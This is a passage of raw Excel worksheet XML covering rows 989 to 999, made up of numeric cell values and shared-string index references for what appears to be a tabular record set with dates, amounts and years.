      <c r="S989">
        <v>0</v>
      </c>
      <c r="T989">
        <v>2</v>
      </c>
      <c r="U989">
        <v>0</v>
      </c>
      <c r="V989">
        <v>0</v>
      </c>
      <c r="W989">
        <v>0</v>
      </c>
      <c r="X989">
        <v>0</v>
      </c>
      <c r="Y989">
        <v>0</v>
      </c>
      <c r="Z989">
        <v>0</v>
      </c>
      <c r="AA989">
        <v>0</v>
      </c>
      <c r="AB989">
        <v>0</v>
      </c>
      <c r="AC989">
        <v>0</v>
      </c>
      <c r="AD989">
        <v>0</v>
      </c>
      <c r="AE989">
        <v>250</v>
      </c>
      <c r="AF989" t="s">
        <v>7565</v>
      </c>
      <c r="AG989">
        <v>29661</v>
      </c>
      <c r="AH989">
        <v>5</v>
      </c>
      <c r="AJ989">
        <v>148</v>
      </c>
      <c r="AK989" t="s">
        <v>7566</v>
      </c>
      <c r="AL989" t="s">
        <v>7567</v>
      </c>
      <c r="AM989" t="s">
        <v>7568</v>
      </c>
      <c r="AN989" t="s">
        <v>55</v>
      </c>
      <c r="AO989">
        <v>2020</v>
      </c>
      <c r="AP989">
        <v>811700502</v>
      </c>
      <c r="AQ989" t="s">
        <v>7569</v>
      </c>
      <c r="AR989" t="s">
        <v>7565</v>
      </c>
      <c r="AS989" t="s">
        <v>71</v>
      </c>
      <c r="AT989" t="s">
        <v>58</v>
      </c>
      <c r="AU989">
        <v>26</v>
      </c>
      <c r="AV989">
        <v>1</v>
      </c>
      <c r="AW989">
        <v>0</v>
      </c>
      <c r="AX989">
        <v>0</v>
      </c>
      <c r="AY989">
        <v>2</v>
      </c>
      <c r="AZ989">
        <v>4</v>
      </c>
      <c r="BA989" t="s">
        <v>17408</v>
      </c>
      <c r="BB989">
        <v>0</v>
      </c>
      <c r="BC989">
        <v>0</v>
      </c>
      <c r="BD989" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="990" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A990">
        <v>4944</v>
      </c>
      <c r="B990" t="s">
        <v>7570</v>
      </c>
      <c r="C990" t="s">
        <v>458</v>
      </c>
      <c r="D990" t="s">
        <v>7571</v>
      </c>
      <c r="E990" t="s">
        <v>49</v>
      </c>
      <c r="F990" t="s">
        <v>7572</v>
      </c>
      <c r="G990" s="1">
        <v>44127</v>
      </c>
      <c r="H990">
        <v>5894</v>
      </c>
      <c r="I990">
        <v>5894</v>
      </c>
      <c r="J990">
        <v>1</v>
      </c>
      <c r="K990">
        <v>0</v>
      </c>
      <c r="L990">
        <v>0</v>
      </c>
      <c r="M990">
        <v>0</v>
      </c>
      <c r="N990">
        <v>0</v>
      </c>
      <c r="O990">
        <v>0</v>
      </c>
      <c r="P990">
        <v>0</v>
      </c>
      <c r="Q990">
        <v>0</v>
      </c>
      <c r="R990">
        <v>0</v>
      </c>
      <c r="S990">
        <v>0</v>
      </c>
      <c r="T990">
        <v>1</v>
      </c>
      <c r="U990">
        <v>2000</v>
      </c>
      <c r="V990">
        <v>0</v>
      </c>
      <c r="W990">
        <v>0</v>
      </c>
      <c r="X990">
        <v>0</v>
      </c>
      <c r="Y990">
        <v>0</v>
      </c>
      <c r="Z990">
        <v>0</v>
      </c>
      <c r="AA990">
        <v>0</v>
      </c>
      <c r="AB990">
        <v>0</v>
      </c>
      <c r="AC990">
        <v>0</v>
      </c>
      <c r="AD990">
        <v>0</v>
      </c>
      <c r="AE990">
        <v>15000</v>
      </c>
      <c r="AF990" t="s">
        <v>7573</v>
      </c>
      <c r="AG990">
        <v>29123</v>
      </c>
      <c r="AH990">
        <v>5</v>
      </c>
      <c r="AJ990">
        <v>154</v>
      </c>
      <c r="AK990" t="s">
        <v>7574</v>
      </c>
      <c r="AL990" t="s">
        <v>7575</v>
      </c>
      <c r="AM990" t="s">
        <v>7576</v>
      </c>
      <c r="AN990" t="s">
        <v>55</v>
      </c>
      <c r="AO990">
        <v>2014</v>
      </c>
      <c r="AP990" t="s">
        <v>7577</v>
      </c>
      <c r="AQ990" t="s">
        <v>7578</v>
      </c>
      <c r="AR990" t="s">
        <v>7573</v>
      </c>
      <c r="AS990" t="s">
        <v>71</v>
      </c>
      <c r="AT990" t="s">
        <v>72</v>
      </c>
      <c r="AU990">
        <v>25</v>
      </c>
      <c r="AV990">
        <v>1</v>
      </c>
      <c r="AW990">
        <v>0</v>
      </c>
      <c r="AX990">
        <v>21</v>
      </c>
      <c r="AY990">
        <v>12</v>
      </c>
      <c r="AZ990">
        <v>0</v>
      </c>
      <c r="BA990" t="s">
        <v>17504</v>
      </c>
      <c r="BB990" t="s">
        <v>16059</v>
      </c>
      <c r="BC990" t="s">
        <v>12333</v>
      </c>
      <c r="BD990" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="991" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A991">
        <v>4945</v>
      </c>
      <c r="B991" t="s">
        <v>7579</v>
      </c>
      <c r="C991" t="s">
        <v>477</v>
      </c>
      <c r="D991" t="s">
        <v>7580</v>
      </c>
      <c r="E991" t="s">
        <v>300</v>
      </c>
      <c r="F991" t="s">
        <v>7581</v>
      </c>
      <c r="G991" s="1">
        <v>44116</v>
      </c>
      <c r="H991">
        <v>5901</v>
      </c>
      <c r="I991">
        <v>5901</v>
      </c>
      <c r="J991">
        <v>3</v>
      </c>
      <c r="K991">
        <v>1</v>
      </c>
      <c r="L991">
        <v>3</v>
      </c>
      <c r="M991">
        <v>1</v>
      </c>
      <c r="N991">
        <v>0</v>
      </c>
      <c r="O991">
        <v>0</v>
      </c>
      <c r="P991">
        <v>0</v>
      </c>
      <c r="Q991">
        <v>0</v>
      </c>
      <c r="R991">
        <v>9</v>
      </c>
      <c r="S991">
        <v>0</v>
      </c>
      <c r="T991">
        <v>2</v>
      </c>
      <c r="U991">
        <v>80</v>
      </c>
      <c r="V991">
        <v>6</v>
      </c>
      <c r="W991">
        <v>3</v>
      </c>
      <c r="X991">
        <v>2</v>
      </c>
      <c r="Y991">
        <v>0</v>
      </c>
      <c r="Z991">
        <v>0</v>
      </c>
      <c r="AA991">
        <v>0</v>
      </c>
      <c r="AB991">
        <v>0</v>
      </c>
      <c r="AC991">
        <v>8</v>
      </c>
      <c r="AD991">
        <v>0</v>
      </c>
      <c r="AE991">
        <v>33</v>
      </c>
      <c r="AF991" t="s">
        <v>3550</v>
      </c>
      <c r="AG991">
        <v>95526</v>
      </c>
      <c r="AH991">
        <v>29</v>
      </c>
      <c r="AJ991">
        <v>383</v>
      </c>
      <c r="AK991" t="s">
        <v>2986</v>
      </c>
      <c r="AL991" t="s">
        <v>3596</v>
      </c>
      <c r="AM991" t="s">
        <v>7582</v>
      </c>
      <c r="AN991" t="s">
        <v>68</v>
      </c>
      <c r="AO991">
        <v>2007</v>
      </c>
      <c r="AP991" t="s">
        <v>7583</v>
      </c>
      <c r="AQ991" t="s">
        <v>7584</v>
      </c>
      <c r="AR991" t="s">
        <v>7585</v>
      </c>
      <c r="AS991" t="s">
        <v>71</v>
      </c>
      <c r="AT991" t="s">
        <v>72</v>
      </c>
      <c r="AU991">
        <v>25</v>
      </c>
      <c r="AV991">
        <v>0</v>
      </c>
      <c r="AW991">
        <v>43</v>
      </c>
      <c r="AX991">
        <v>55</v>
      </c>
      <c r="AY991">
        <v>20</v>
      </c>
      <c r="AZ991">
        <v>24</v>
      </c>
      <c r="BA991" t="s">
        <v>17505</v>
      </c>
      <c r="BB991">
        <v>0</v>
      </c>
      <c r="BC991">
        <v>0</v>
      </c>
      <c r="BD991" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="992" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A992">
        <v>4934</v>
      </c>
      <c r="B992" t="s">
        <v>7586</v>
      </c>
      <c r="C992" t="s">
        <v>3692</v>
      </c>
      <c r="D992" t="s">
        <v>7587</v>
      </c>
      <c r="E992" t="s">
        <v>528</v>
      </c>
      <c r="F992" t="s">
        <v>7588</v>
      </c>
      <c r="G992" s="1">
        <v>44084</v>
      </c>
      <c r="H992">
        <v>5944</v>
      </c>
      <c r="I992">
        <v>5944</v>
      </c>
      <c r="J992">
        <v>0</v>
      </c>
      <c r="K992">
        <v>0</v>
      </c>
      <c r="L992">
        <v>0</v>
      </c>
      <c r="M992">
        <v>0</v>
      </c>
      <c r="N992">
        <v>0</v>
      </c>
      <c r="O992">
        <v>2</v>
      </c>
      <c r="P992">
        <v>0</v>
      </c>
      <c r="Q992">
        <v>1</v>
      </c>
      <c r="R992">
        <v>1</v>
      </c>
      <c r="S992">
        <v>1</v>
      </c>
      <c r="T992">
        <v>1</v>
      </c>
      <c r="U992">
        <v>0</v>
      </c>
      <c r="V992">
        <v>0</v>
      </c>
      <c r="W992">
        <v>0</v>
      </c>
      <c r="X992">
        <v>0</v>
      </c>
      <c r="Y992">
        <v>0</v>
      </c>
      <c r="Z992">
        <v>2</v>
      </c>
      <c r="AA992">
        <v>0</v>
      </c>
      <c r="AB992">
        <v>200</v>
      </c>
      <c r="AC992">
        <v>150</v>
      </c>
      <c r="AD992">
        <v>1</v>
      </c>
      <c r="AE992">
        <v>500</v>
      </c>
      <c r="AF992" t="s">
        <v>7589</v>
      </c>
      <c r="AG992">
        <v>26352</v>
      </c>
      <c r="AH992">
        <v>3</v>
      </c>
      <c r="AJ992">
        <v>65</v>
      </c>
      <c r="AK992" t="s">
        <v>7590</v>
      </c>
      <c r="AL992" t="s">
        <v>7591</v>
      </c>
      <c r="AM992" t="s">
        <v>7592</v>
      </c>
      <c r="AN992" t="s">
        <v>68</v>
      </c>
      <c r="AO992">
        <v>2003</v>
      </c>
      <c r="AP992">
        <v>82171850916</v>
      </c>
      <c r="AQ992" t="s">
        <v>7593</v>
      </c>
      <c r="AR992" t="s">
        <v>7589</v>
      </c>
      <c r="AS992" t="s">
        <v>71</v>
      </c>
      <c r="AT992" t="s">
        <v>72</v>
      </c>
      <c r="AU992">
        <v>24</v>
      </c>
      <c r="AV992">
        <v>8</v>
      </c>
      <c r="AW992">
        <v>1</v>
      </c>
      <c r="AX992">
        <v>2</v>
      </c>
      <c r="AY992">
        <v>2</v>
      </c>
      <c r="AZ992">
        <v>13</v>
      </c>
      <c r="BA992" t="s">
        <v>17499</v>
      </c>
      <c r="BB992" t="s">
        <v>16060</v>
      </c>
      <c r="BC992" t="s">
        <v>11894</v>
      </c>
      <c r="BD992">
        <v>0</v>
      </c>
    </row>
    <row r="993" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A993">
        <v>4925</v>
      </c>
      <c r="B993" t="s">
        <v>7594</v>
      </c>
      <c r="C993" t="s">
        <v>2308</v>
      </c>
      <c r="D993" t="s">
        <v>7595</v>
      </c>
      <c r="E993" t="s">
        <v>142</v>
      </c>
      <c r="F993" t="s">
        <v>7596</v>
      </c>
      <c r="G993" s="1">
        <v>44103</v>
      </c>
      <c r="H993">
        <v>5963</v>
      </c>
      <c r="I993">
        <v>5963</v>
      </c>
      <c r="J993">
        <v>2</v>
      </c>
      <c r="K993">
        <v>1</v>
      </c>
      <c r="L993">
        <v>1</v>
      </c>
      <c r="M993">
        <v>1</v>
      </c>
      <c r="N993">
        <v>0</v>
      </c>
      <c r="O993">
        <v>0</v>
      </c>
      <c r="P993">
        <v>0</v>
      </c>
      <c r="Q993">
        <v>5</v>
      </c>
      <c r="R993">
        <v>4</v>
      </c>
      <c r="S993">
        <v>0</v>
      </c>
      <c r="T993">
        <v>1</v>
      </c>
      <c r="U993">
        <v>60000</v>
      </c>
      <c r="V993">
        <v>30000</v>
      </c>
      <c r="W993">
        <v>30000</v>
      </c>
      <c r="X993">
        <v>5000</v>
      </c>
      <c r="Y993">
        <v>0</v>
      </c>
      <c r="Z993">
        <v>0</v>
      </c>
      <c r="AA993">
        <v>0</v>
      </c>
      <c r="AB993">
        <v>5000</v>
      </c>
      <c r="AC993">
        <v>2000</v>
      </c>
      <c r="AD993">
        <v>0</v>
      </c>
      <c r="AE993">
        <v>10000</v>
      </c>
      <c r="AF993" t="s">
        <v>3163</v>
      </c>
      <c r="AG993">
        <v>98013</v>
      </c>
      <c r="AH993">
        <v>33</v>
      </c>
      <c r="AJ993">
        <v>473</v>
      </c>
      <c r="AK993" t="s">
        <v>7597</v>
      </c>
      <c r="AL993" t="s">
        <v>7598</v>
      </c>
      <c r="AM993" t="s">
        <v>7599</v>
      </c>
      <c r="AN993" t="s">
        <v>55</v>
      </c>
      <c r="AO993">
        <v>2018</v>
      </c>
      <c r="AP993">
        <v>81267150575</v>
      </c>
      <c r="AQ993" t="s">
        <v>7600</v>
      </c>
      <c r="AR993" t="s">
        <v>7601</v>
      </c>
      <c r="AS993" t="s">
        <v>71</v>
      </c>
      <c r="AT993" t="s">
        <v>58</v>
      </c>
      <c r="AU993">
        <v>20</v>
      </c>
      <c r="AV993">
        <v>2</v>
      </c>
      <c r="AW993">
        <v>10</v>
      </c>
      <c r="AX993">
        <v>5</v>
      </c>
      <c r="AY993">
        <v>7</v>
      </c>
      <c r="AZ993">
        <v>5</v>
      </c>
      <c r="BA993" t="s">
        <v>17494</v>
      </c>
      <c r="BB993" t="s">
        <v>17511</v>
      </c>
      <c r="BC993" t="s">
        <v>9693</v>
      </c>
      <c r="BD993" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="994" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A994">
        <v>4957</v>
      </c>
      <c r="B994" t="s">
        <v>7602</v>
      </c>
      <c r="C994" t="s">
        <v>477</v>
      </c>
      <c r="D994" t="s">
        <v>7603</v>
      </c>
      <c r="E994" t="s">
        <v>142</v>
      </c>
      <c r="F994" t="s">
        <v>666</v>
      </c>
      <c r="G994" s="1">
        <v>44113</v>
      </c>
      <c r="H994">
        <v>5971</v>
      </c>
      <c r="I994">
        <v>5971</v>
      </c>
      <c r="J994">
        <v>1</v>
      </c>
      <c r="K994">
        <v>0</v>
      </c>
      <c r="L994">
        <v>14</v>
      </c>
      <c r="M994">
        <v>0</v>
      </c>
      <c r="N994">
        <v>0</v>
      </c>
      <c r="O994">
        <v>0</v>
      </c>
      <c r="P994">
        <v>0</v>
      </c>
      <c r="Q994">
        <v>0</v>
      </c>
      <c r="R994">
        <v>0</v>
      </c>
      <c r="S994">
        <v>0</v>
      </c>
      <c r="T994">
        <v>1</v>
      </c>
      <c r="U994">
        <v>100000</v>
      </c>
      <c r="V994">
        <v>0</v>
      </c>
      <c r="W994">
        <v>64000</v>
      </c>
      <c r="X994">
        <v>0</v>
      </c>
      <c r="Y994">
        <v>0</v>
      </c>
      <c r="Z994">
        <v>0</v>
      </c>
      <c r="AA994">
        <v>0</v>
      </c>
      <c r="AB994">
        <v>0</v>
      </c>
      <c r="AC994">
        <v>0</v>
      </c>
      <c r="AD994">
        <v>0</v>
      </c>
      <c r="AE994">
        <v>5000</v>
      </c>
      <c r="AF994" t="s">
        <v>7604</v>
      </c>
      <c r="AG994">
        <v>95547</v>
      </c>
      <c r="AH994">
        <v>29</v>
      </c>
      <c r="AJ994">
        <v>383</v>
      </c>
      <c r="AK994" t="s">
        <v>1339</v>
      </c>
      <c r="AL994" t="s">
        <v>1340</v>
      </c>
      <c r="AM994" t="s">
        <v>7605</v>
      </c>
      <c r="AN994" t="s">
        <v>55</v>
      </c>
      <c r="AO994">
        <v>2020</v>
      </c>
      <c r="AP994">
        <v>81310122833</v>
      </c>
      <c r="AQ994" t="s">
        <v>7606</v>
      </c>
      <c r="AR994" t="s">
        <v>7606</v>
      </c>
      <c r="AS994" t="s">
        <v>71</v>
      </c>
      <c r="AT994" t="s">
        <v>58</v>
      </c>
      <c r="AU994">
        <v>25</v>
      </c>
      <c r="AV994">
        <v>1</v>
      </c>
      <c r="AW994">
        <v>15</v>
      </c>
      <c r="AX994">
        <v>15</v>
      </c>
      <c r="AY994">
        <v>4</v>
      </c>
      <c r="AZ994">
        <v>3</v>
      </c>
      <c r="BA994" t="s">
        <v>17510</v>
      </c>
      <c r="BB994">
        <v>0</v>
      </c>
      <c r="BC994" t="s">
        <v>11889</v>
      </c>
      <c r="BD994">
        <v>0</v>
      </c>
    </row>
    <row r="995" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A995">
        <v>4913</v>
      </c>
      <c r="B995" t="s">
        <v>7607</v>
      </c>
      <c r="C995" t="s">
        <v>2308</v>
      </c>
      <c r="D995" t="s">
        <v>6305</v>
      </c>
      <c r="E995" t="s">
        <v>142</v>
      </c>
      <c r="F995" t="s">
        <v>403</v>
      </c>
      <c r="G995" s="1">
        <v>44109</v>
      </c>
      <c r="H995">
        <v>5979</v>
      </c>
      <c r="I995">
        <v>5979</v>
      </c>
      <c r="J995">
        <v>1</v>
      </c>
      <c r="K995">
        <v>0</v>
      </c>
      <c r="L995">
        <v>2</v>
      </c>
      <c r="M995">
        <v>0</v>
      </c>
      <c r="N995">
        <v>0</v>
      </c>
      <c r="O995">
        <v>0</v>
      </c>
      <c r="P995">
        <v>0</v>
      </c>
      <c r="Q995">
        <v>3</v>
      </c>
      <c r="R995">
        <v>5</v>
      </c>
      <c r="S995">
        <v>0</v>
      </c>
      <c r="T995">
        <v>1</v>
      </c>
      <c r="U995">
        <v>100000</v>
      </c>
      <c r="V995">
        <v>0</v>
      </c>
      <c r="W995">
        <v>15000</v>
      </c>
      <c r="X995">
        <v>0</v>
      </c>
      <c r="Y995">
        <v>0</v>
      </c>
      <c r="Z995">
        <v>0</v>
      </c>
      <c r="AA995">
        <v>0</v>
      </c>
      <c r="AB995">
        <v>1500</v>
      </c>
      <c r="AC995">
        <v>2500</v>
      </c>
      <c r="AD995">
        <v>0</v>
      </c>
      <c r="AE995">
        <v>10000</v>
      </c>
      <c r="AF995" t="s">
        <v>7608</v>
      </c>
      <c r="AG995">
        <v>98415</v>
      </c>
      <c r="AH995">
        <v>33</v>
      </c>
      <c r="AJ995">
        <v>485</v>
      </c>
      <c r="AK995" t="s">
        <v>2313</v>
      </c>
      <c r="AL995" t="s">
        <v>2314</v>
      </c>
      <c r="AM995" t="s">
        <v>7609</v>
      </c>
      <c r="AN995" t="s">
        <v>68</v>
      </c>
      <c r="AO995">
        <v>2018</v>
      </c>
      <c r="AP995">
        <v>85334886555</v>
      </c>
      <c r="AQ995" t="s">
        <v>7610</v>
      </c>
      <c r="AR995" t="s">
        <v>7608</v>
      </c>
      <c r="AS995" t="s">
        <v>71</v>
      </c>
      <c r="AT995" t="s">
        <v>72</v>
      </c>
      <c r="AU995">
        <v>20</v>
      </c>
      <c r="AV995">
        <v>1</v>
      </c>
      <c r="AW995">
        <v>4</v>
      </c>
      <c r="AX995">
        <v>0</v>
      </c>
      <c r="AY995">
        <v>4</v>
      </c>
      <c r="AZ995">
        <v>3</v>
      </c>
      <c r="BA995" t="s">
        <v>17487</v>
      </c>
      <c r="BB995" t="s">
        <v>17491</v>
      </c>
      <c r="BC995" t="s">
        <v>9693</v>
      </c>
      <c r="BD995">
        <v>0</v>
      </c>
    </row>
    <row r="996" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A996">
        <v>4783</v>
      </c>
      <c r="B996" t="s">
        <v>7611</v>
      </c>
      <c r="C996" t="s">
        <v>2848</v>
      </c>
      <c r="D996" t="s">
        <v>7612</v>
      </c>
      <c r="E996" t="s">
        <v>49</v>
      </c>
      <c r="F996" t="s">
        <v>7613</v>
      </c>
      <c r="G996" s="1">
        <v>44120</v>
      </c>
      <c r="H996">
        <v>5986</v>
      </c>
      <c r="I996">
        <v>5986</v>
      </c>
      <c r="J996">
        <v>0</v>
      </c>
      <c r="K996">
        <v>0</v>
      </c>
      <c r="L996">
        <v>0</v>
      </c>
      <c r="M996">
        <v>0</v>
      </c>
      <c r="N996">
        <v>0</v>
      </c>
      <c r="O996">
        <v>0</v>
      </c>
      <c r="P996">
        <v>0</v>
      </c>
      <c r="Q996">
        <v>1</v>
      </c>
      <c r="R996">
        <v>1</v>
      </c>
      <c r="S996">
        <v>0</v>
      </c>
      <c r="T996">
        <v>0</v>
      </c>
      <c r="U996">
        <v>0</v>
      </c>
      <c r="V996">
        <v>0</v>
      </c>
      <c r="W996">
        <v>0</v>
      </c>
      <c r="X996">
        <v>0</v>
      </c>
      <c r="Y996">
        <v>0</v>
      </c>
      <c r="Z996">
        <v>0</v>
      </c>
      <c r="AA996">
        <v>0</v>
      </c>
      <c r="AB996">
        <v>50</v>
      </c>
      <c r="AC996">
        <v>50</v>
      </c>
      <c r="AD996">
        <v>1</v>
      </c>
      <c r="AE996">
        <v>0</v>
      </c>
      <c r="AF996" t="s">
        <v>7614</v>
      </c>
      <c r="AG996">
        <v>30163</v>
      </c>
      <c r="AH996">
        <v>9</v>
      </c>
      <c r="AJ996">
        <v>112</v>
      </c>
      <c r="AK996" t="s">
        <v>7615</v>
      </c>
      <c r="AL996" t="s">
        <v>7616</v>
      </c>
      <c r="AM996" t="s">
        <v>7617</v>
      </c>
      <c r="AN996" t="s">
        <v>68</v>
      </c>
      <c r="AO996">
        <v>2010</v>
      </c>
      <c r="AP996">
        <v>711367576</v>
      </c>
      <c r="AQ996" t="s">
        <v>7618</v>
      </c>
      <c r="AR996" t="s">
        <v>7614</v>
      </c>
      <c r="AS996" t="s">
        <v>57</v>
      </c>
      <c r="AT996" t="s">
        <v>58</v>
      </c>
      <c r="AU996">
        <v>25</v>
      </c>
      <c r="AV996">
        <v>0</v>
      </c>
      <c r="AW996">
        <v>5</v>
      </c>
      <c r="AX996">
        <v>2</v>
      </c>
      <c r="AY996">
        <v>7</v>
      </c>
      <c r="AZ996">
        <v>3</v>
      </c>
      <c r="BA996" t="s">
        <v>17407</v>
      </c>
      <c r="BB996">
        <v>0</v>
      </c>
      <c r="BC996">
        <v>0</v>
      </c>
      <c r="BD996" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="997" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A997">
        <v>2763</v>
      </c>
      <c r="B997" t="s">
        <v>7619</v>
      </c>
      <c r="C997" t="s">
        <v>74</v>
      </c>
      <c r="D997" t="s">
        <v>7620</v>
      </c>
      <c r="E997" t="s">
        <v>142</v>
      </c>
      <c r="F997" t="s">
        <v>7621</v>
      </c>
      <c r="G997" s="1">
        <v>44124</v>
      </c>
      <c r="H997">
        <v>5993</v>
      </c>
      <c r="I997">
        <v>5993</v>
      </c>
      <c r="J997">
        <v>1</v>
      </c>
      <c r="K997">
        <v>0</v>
      </c>
      <c r="L997">
        <v>0</v>
      </c>
      <c r="M997">
        <v>2</v>
      </c>
      <c r="N997">
        <v>0</v>
      </c>
      <c r="O997">
        <v>0</v>
      </c>
      <c r="P997">
        <v>0</v>
      </c>
      <c r="Q997">
        <v>3</v>
      </c>
      <c r="R997">
        <v>0</v>
      </c>
      <c r="S997">
        <v>1</v>
      </c>
      <c r="T997">
        <v>0</v>
      </c>
      <c r="U997">
        <v>100000</v>
      </c>
      <c r="V997">
        <v>0</v>
      </c>
      <c r="W997">
        <v>0</v>
      </c>
      <c r="X997">
        <v>2100</v>
      </c>
      <c r="Y997">
        <v>0</v>
      </c>
      <c r="Z997">
        <v>0</v>
      </c>
      <c r="AA997">
        <v>0</v>
      </c>
      <c r="AB997">
        <v>300</v>
      </c>
      <c r="AC997">
        <v>0</v>
      </c>
      <c r="AD997">
        <v>1</v>
      </c>
      <c r="AE997">
        <v>0</v>
      </c>
      <c r="AF997" t="s">
        <v>7622</v>
      </c>
      <c r="AG997">
        <v>51141</v>
      </c>
      <c r="AH997">
        <v>14</v>
      </c>
      <c r="AJ997">
        <v>221</v>
      </c>
      <c r="AK997" t="s">
        <v>3301</v>
      </c>
      <c r="AL997" t="s">
        <v>3302</v>
      </c>
      <c r="AM997" t="s">
        <v>7623</v>
      </c>
      <c r="AN997" t="s">
        <v>55</v>
      </c>
      <c r="AO997">
        <v>2018</v>
      </c>
      <c r="AP997">
        <v>285434175</v>
      </c>
      <c r="AQ997" t="s">
        <v>7624</v>
      </c>
      <c r="AR997" t="s">
        <v>7622</v>
      </c>
      <c r="AS997" t="s">
        <v>71</v>
      </c>
      <c r="AT997" t="s">
        <v>58</v>
      </c>
      <c r="AU997">
        <v>0</v>
      </c>
      <c r="AV997">
        <v>0</v>
      </c>
      <c r="AW997">
        <v>10</v>
      </c>
      <c r="AX997">
        <v>10</v>
      </c>
      <c r="AY997">
        <v>5</v>
      </c>
      <c r="AZ997">
        <v>4</v>
      </c>
      <c r="BA997" t="s">
        <v>17315</v>
      </c>
      <c r="BB997" t="s">
        <v>15919</v>
      </c>
      <c r="BC997" t="s">
        <v>11925</v>
      </c>
      <c r="BD997" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="998" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A998">
        <v>4871</v>
      </c>
      <c r="B998" t="s">
        <v>5612</v>
      </c>
      <c r="C998" t="s">
        <v>318</v>
      </c>
      <c r="D998" t="s">
        <v>7625</v>
      </c>
      <c r="E998" t="s">
        <v>363</v>
      </c>
      <c r="F998" t="s">
        <v>7626</v>
      </c>
      <c r="G998" s="1">
        <v>44316</v>
      </c>
      <c r="H998">
        <v>6006</v>
      </c>
      <c r="I998">
        <v>6006</v>
      </c>
      <c r="J998">
        <v>0</v>
      </c>
      <c r="K998">
        <v>0</v>
      </c>
      <c r="L998">
        <v>0</v>
      </c>
      <c r="M998">
        <v>0</v>
      </c>
      <c r="N998">
        <v>0</v>
      </c>
      <c r="O998">
        <v>0</v>
      </c>
      <c r="P998">
        <v>0</v>
      </c>
      <c r="Q998">
        <v>0</v>
      </c>
      <c r="R998">
        <v>0</v>
      </c>
      <c r="S998">
        <v>0</v>
      </c>
      <c r="T998">
        <v>1</v>
      </c>
      <c r="U998">
        <v>0</v>
      </c>
      <c r="V998">
        <v>0</v>
      </c>
      <c r="W998">
        <v>0</v>
      </c>
      <c r="X998">
        <v>0</v>
      </c>
      <c r="Y998">
        <v>0</v>
      </c>
      <c r="Z998">
        <v>0</v>
      </c>
      <c r="AA998">
        <v>0</v>
      </c>
      <c r="AB998">
        <v>0</v>
      </c>
      <c r="AC998">
        <v>0</v>
      </c>
      <c r="AD998">
        <v>0</v>
      </c>
      <c r="AE998">
        <v>1000</v>
      </c>
      <c r="AF998" t="s">
        <v>5615</v>
      </c>
      <c r="AG998">
        <v>92255</v>
      </c>
      <c r="AH998">
        <v>26</v>
      </c>
      <c r="AJ998">
        <v>403</v>
      </c>
      <c r="AK998" t="s">
        <v>2255</v>
      </c>
      <c r="AL998" t="s">
        <v>7627</v>
      </c>
      <c r="AM998" t="s">
        <v>7628</v>
      </c>
      <c r="AN998" t="s">
        <v>68</v>
      </c>
      <c r="AO998">
        <v>2017</v>
      </c>
      <c r="AP998">
        <v>81241477775</v>
      </c>
      <c r="AQ998" t="s">
        <v>5619</v>
      </c>
      <c r="AR998" t="s">
        <v>5615</v>
      </c>
      <c r="AS998" t="s">
        <v>71</v>
      </c>
      <c r="AT998" t="s">
        <v>58</v>
      </c>
      <c r="AU998">
        <v>26</v>
      </c>
      <c r="AV998">
        <v>1</v>
      </c>
      <c r="AW998">
        <v>0</v>
      </c>
      <c r="AX998">
        <v>0</v>
      </c>
      <c r="AY998">
        <v>4</v>
      </c>
      <c r="AZ998">
        <v>2</v>
      </c>
      <c r="BA998" t="s">
        <v>17231</v>
      </c>
      <c r="BB998" t="s">
        <v>17462</v>
      </c>
      <c r="BC998" t="s">
        <v>10238</v>
      </c>
      <c r="BD998" t="s">
        <v>11897</v>
      </c>
    </row>
    <row r="999" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A999">
        <v>4963</v>
      </c>
      <c r="B999" t="s">
        <v>7629</v>
      </c>
      <c r="C999" t="s">
        <v>477</v>
      </c>
      <c r="D999" t="s">
        <v>7630</v>
      </c>
      <c r="E999" t="s">
        <v>300</v>
      </c>
      <c r="F999" t="s">
        <v>899</v>
      </c>
      <c r="G999" s="1">
        <v>44113</v>
      </c>
      <c r="H999">
        <v>6060</v>
      </c>
      <c r="I999">
        <v>6060</v>
      </c>
      <c r="J999">
        <v>0</v>
      </c>
      <c r="K999">
        <v>0</v>
      </c>
      <c r="L999">
        <v>1</v>
      </c>
      <c r="M999">
        <v>0</v>
      </c>
      <c r="N999">
        <v>0</v>
      </c>
      <c r="O999">
        <v>0</v>
      </c>
      <c r="P999">
        <v>0</v>
      </c>
      <c r="Q999">
        <v>0</v>
      </c>
      <c r="R999">
        <v>2</v>
      </c>
      <c r="S999">
        <v>0</v>
      </c>
      <c r="T999">
        <v>1</v>
      </c>
      <c r="U999">
        <v>0</v>
      </c>
      <c r="V999">
        <v>0</v>
      </c>
      <c r="W999">
        <v>500</v>
      </c>
      <c r="X999">
        <v>0</v>
      </c>
      <c r="Y999">
        <v>0</v>
      </c>
      <c r="Z999">
        <v>0</v>
      </c>
      <c r="AA999">
        <v>0</v>
      </c>
      <c r="AB999">
        <v>0</v>
      </c>
      <c r="AC999">
        <v>500</v>
      </c>
      <c r="AD999">
        <v>0</v>
      </c>
      <c r="AE999">
        <v>500</v>
      </c>
      <c r="AF999" t="s">
        <v>7631</v>
      </c>
      <c r="AG999">
        <v>95546</v>
      </c>
      <c r="AH999">
        <v>29</v>
      </c>
      <c r="AJ999">
        <v>383</v>
      </c>
      <c r="AK999" t="s">
        <v>1339</v>
      </c>
      <c r="AL999" t="s">
        <v>6850</v>
      </c>
      <c r="AM999" t="s">
        <v>7632</v>
      </c>
      <c r="AN999" t="s">
        <v>55</v>
      </c>
      <c r="AO999">
        <v>2020</v>
      </c>
      <c r="AP999" t="s">
        <v>7633</v>
      </c>
      <c r="AQ999" t="s">
        <v>7633</v>
      </c>
      <c r="AR999" t="s">
        <v>7631</v>
      </c>
      <c r="AS999" t="s">
        <v>71</v>
      </c>
      <c r="AT999" t="s">
        <v>58</v>
      </c>
